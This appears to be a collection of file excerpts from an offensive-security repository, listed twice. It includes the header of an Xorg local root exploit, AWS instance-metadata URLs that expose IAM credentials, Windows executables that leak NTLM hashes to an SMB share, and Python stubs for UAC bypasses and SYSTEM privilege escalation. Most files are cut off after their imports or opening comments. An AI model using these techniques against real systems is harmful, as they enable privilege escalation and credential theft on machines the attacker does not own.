makelaris makelariss

## x0rg.sh
#!/bin/bash
# x0rg - Xorg Local Root Exploit
# Released under the Snitches Get Stitches Public Licence.
# props to prdelka / fantastic for the shadow vector.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (25/10/2018)
# FREE LAURI LOVE!
echo "x0rg"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c

## cloud_metadata.txt
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

## anonymous
Executables for Capturing Hashes (incomplete list)
(all file locations are system32 - win10, impacket-smbserver with -smb2support used for testing)

@0rbz_

attrib.exe \\host\share
bcdboot.exe \\host\share
bdeunlock.exe \\host\share
cacls.exe \\host\share
certreq.exe \\host\share (noisy, pops an error dialog)

## uacbypassEnviromentVariableExpansion.py
# -*- coding: utf-8 -*-
# All credits go to https://tyranidslair.blogspot.gr/2017/05/exploiting-environment-variables-in.html
'''
SilentCleanup has a "Highest" RunLevel meaning it will elevate the scheduled task to administrator without any prompting.
It also contains enviroment variables in the path set on "Execute" (%windir%\system32\cleanmgr.exe), the Enviroment variables are stored in the HKCU registry hive which is write accesible by a user. (HKCU\Environment)
We can perform a AlwaysNotify UAC Bypass by changing the enviroment variable's 'windir' value to our own payload and triggering it through the SilentCleanup scheduled task.
'''

from _winreg import *
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)

## popshellslikeitsafriday.py
# -*- coding: UTF-8 -*-
from ctypes.wintypes import *
from ctypes import *
from enum import IntEnum


# These libraries have the APIs we need
kernel32 = WinDLL('kernel32',    use_last_error=True)
advapi32 = WinDLL('advapi32',    use_last_error=True)
psapi    = WinDLL('psapi.dll',   use_last_error=True)

## popshellslikeitsasaturday.py
# -*- coding: UTF-8 -*-
# All credits go to: https://github.com/joren485/PyWinPrivEsc/blob/master/RunAsSystem.py
from ctypes.wintypes import *
from ctypes import *
from enum import IntEnum

# These libraries have the APIs we need
kernel32 = WinDLL('kernel32',  use_last_error=True)
advapi32 = WinDLL('advapi32',  use_last_error=True)
psapi    = WinDLL('psapi.dll', use_last_error=True)

## uacbypasstokenmanipulation.py
# -*- coding: utf-8 -*-
# All credits go to CIA: https://gist.github.com/hfiref0x/59c689a14f1fc2302d858ae0aa3f6b86 (please don't hack me <3 :))
# This is trully a Always Notify UAC Bypass,cause it uses process enumeration to find elevated processes. Since you need administrative privileges to get TOKEN_ELEVATION,we look for processes with manifests that have <autoElevate></autoElevate> set to True.
from ctypes.wintypes import *
from ctypes import *
from enum import IntEnum

kernel32 = WinDLL('kernel32', use_last_error=True)
advapi32 = WinDLL('advapi32', use_last_error=True)
shell32  = WinDLL('shell32' , use_last_error=True)

## uacbypassSlui_exe.py
# -*- coding: utf-8 -*-
# All credits go to https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation
'''
slui.exe is an auto-elevated binary that is vulnerable to file handler hijacking.
Read access to HKCU\Software\Classes\exefile\shell\open is performed upon execution.
Due to the registry key being accessible from user mode, an arbitrary executable file can be injected.
'''

from _winreg import *
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)

## autoelevate.lst
C:\Windows\System32\bthudtask.exe:           			<autoElevate>true</autoElevate>
C:\Windows\System32\changepk.exe:             			<autoElevate>true</autoElevate>
C:\Windows\System32\ComputerDefaults.exe:         		<autoElevate>true</autoElevate>
C:\Windows\System32\dccw.exe:       				<autoElevate>true</autoElevate>
C:\Windows\System32\dcomcnfg.exe:           			<autoElevate>true</autoElevate>
C:\Windows\System32\DeviceEject.exe:             		<autoElevate>true</autoElevate>
C:\Windows\System32\DeviceProperties.exe:         		<autoElevate>true</autoElevate>
C:\Windows\System32\djoin.exe:         				<autoElevate>true</autoElevate>
C:\Windows\System32\easinvoker.exe:       			<autoElevate>true</autoElevate>
C:\Windows\System32\EASPolicyManagerBrokerHost.exe:       	<autoElevate>true</autoElevate>

## popshellslikeitsatuesday.py
# -*- coding: UTF-8 -*-
import enum, os, sys
# https://twitter.com/highsenburger69
from ctypes.wintypes import *
from ctypes import *
# These libraries have the APIs we need
kernel32 = WinDLL('kernel32',  use_last_error=True)
advapi32 = WinDLL('advapi32',  use_last_error=True)
shell32  = WinDLL('shell32',   use_last_error=True)
psapi    = WinDLL('psapi.dll', use_last_error=True)
	#!/bin/bash
	# x0rg - Xorg Local Root Exploit
	# Released under the Snitches Get Stitches Public Licence.
	# props to prdelka / fantastic for the shadow vector.
	# Gr33tz to everyone in #lizardhq and elsewhere <3
	# ~infodox (25/10/2018)
	# FREE LAURI LOVE!
	echo "x0rg"
	echo "[+] First, we create our shell and library..."
	cat << EOF > /tmp/libhax.c
	## AWS
	# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

	http://169.254.169.254/latest/user-data
	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/ami-id
	http://169.254.169.254/latest/meta-data/reservation-id
	http://169.254.169.254/latest/meta-data/hostname
	http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
	Executables for Capturing Hashes (incomplete list)
	(all file locations are system32 - win10, impacket-smbserver with -smb2support used for testing)

	@0rbz_

	attrib.exe \\host\share
	bcdboot.exe \\host\share
	bdeunlock.exe \\host\share
	cacls.exe \\host\share
	certreq.exe \\host\share (noisy, pops an error dialog)
	# -- coding: utf-8 --
	# All credits go to https://tyranidslair.blogspot.gr/2017/05/exploiting-environment-variables-in.html
	'''
	SilentCleanup has a "Highest" RunLevel meaning it will elevate the scheduled task to administrator without any prompting.
	It also contains enviroment variables in the path set on "Execute" (%windir%\system32\cleanmgr.exe), the Enviroment variables are stored in the HKCU registry hive which is write accesible by a user. (HKCU\Environment)
	We can perform a AlwaysNotify UAC Bypass by changing the enviroment variable's 'windir' value to our own payload and triggering it through the SilentCleanup scheduled task.
	'''

	from _winreg import *
	HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
	# -- coding: UTF-8 --
	from ctypes.wintypes import *
	from ctypes import *
	from enum import IntEnum


	# These libraries have the APIs we need
	kernel32 = WinDLL('kernel32', use_last_error=True)
	advapi32 = WinDLL('advapi32', use_last_error=True)
	psapi = WinDLL('psapi.dll', use_last_error=True)
	# -- coding: UTF-8 --
	# All credits go to: https://github.com/joren485/PyWinPrivEsc/blob/master/RunAsSystem.py
	from ctypes.wintypes import *
	from ctypes import *
	from enum import IntEnum

	# These libraries have the APIs we need
	kernel32 = WinDLL('kernel32', use_last_error=True)
	advapi32 = WinDLL('advapi32', use_last_error=True)
	psapi = WinDLL('psapi.dll', use_last_error=True)
	# -- coding: utf-8 --
	# All credits go to CIA: https://gist.github.com/hfiref0x/59c689a14f1fc2302d858ae0aa3f6b86 (please don't hack me <3 :))
	# This is trully a Always Notify UAC Bypass,cause it uses process enumeration to find elevated processes. Since you need administrative privileges to get TOKEN_ELEVATION,we look for processes with manifests that have <autoElevate></autoElevate> set to True.
	from ctypes.wintypes import *
	from ctypes import *
	from enum import IntEnum

	kernel32 = WinDLL('kernel32', use_last_error=True)
	advapi32 = WinDLL('advapi32', use_last_error=True)
	shell32 = WinDLL('shell32' , use_last_error=True)
	# -- coding: utf-8 --
	# All credits go to https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation
	'''
	slui.exe is an auto-elevated binary that is vulnerable to file handler hijacking.
	Read access to HKCU\Software\Classes\exefile\shell\open is performed upon execution.
	Due to the registry key being accessible from user mode, an arbitrary executable file can be injected.
	'''

	from _winreg import *
	HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
	C:\Windows\System32\bthudtask.exe: <autoElevate>true</autoElevate>
	C:\Windows\System32\changepk.exe: <autoElevate>true</autoElevate>
	C:\Windows\System32\ComputerDefaults.exe: <autoElevate>true</autoElevate>
	C:\Windows\System32\dccw.exe: <autoElevate>true</autoElevate>
	C:\Windows\System32\dcomcnfg.exe: <autoElevate>true</autoElevate>
	C:\Windows\System32\DeviceEject.exe: <autoElevate>true</autoElevate>
	C:\Windows\System32\DeviceProperties.exe: <autoElevate>true</autoElevate>
	C:\Windows\System32\djoin.exe: <autoElevate>true</autoElevate>
	C:\Windows\System32\easinvoker.exe: <autoElevate>true</autoElevate>
	C:\Windows\System32\EASPolicyManagerBrokerHost.exe: <autoElevate>true</autoElevate>
	# -- coding: UTF-8 --
	import enum, os, sys
	# https://twitter.com/highsenburger69
	from ctypes.wintypes import *
	from ctypes import *
	# These libraries have the APIs we need
	kernel32 = WinDLL('kernel32', use_last_error=True)
	advapi32 = WinDLL('advapi32', use_last_error=True)
	shell32 = WinDLL('shell32', use_last_error=True)
	psapi = WinDLL('psapi.dll', use_last_error=True)